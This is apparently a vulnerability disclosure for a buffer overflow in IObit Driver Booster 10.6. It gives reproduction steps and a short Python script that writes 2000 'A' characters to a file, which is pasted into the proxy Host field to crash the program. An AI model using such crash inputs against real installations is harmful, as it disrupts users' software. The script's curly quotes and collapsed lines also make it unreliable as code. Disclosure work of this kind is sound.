Exploit Title: Driver Booster 10.6 - Buffer Overflow (PoC)
Discovered by: Ahmet Ümit BAYRAM
Discovered Date: 10.09.2023
Vendor Homepage: https://www.iobit.com
Software Link: https://cdn.iobit.com/dl/driver_booster_setup.exe
Tested Version: 10.6 (latest)
Tested on: Windows 2019 Server 64bit
Steps to Reproduce
- Open Driver Booster.
- Click on Settings from the hamburger menu on the top left.
- In the Network tab, check the Customize proxy box.
- Paste the contents of
poc.txt
into the Host section and save. - The application crashes due to a buffer overflow.
Proof of Concept (PoC)
The following script generates a poc.txt
file containing 2000 “A” characters. When loaded into the Host field in Driver Booster, it causes the application to crash.
```python #!/usr/bin/python
poc = ‘A’ * 2000
try: file = open(“poc.txt”, “w”) file.write(poc) file.close() print(“POC is created”) except Exception as e: print(“POC is not created:”, e)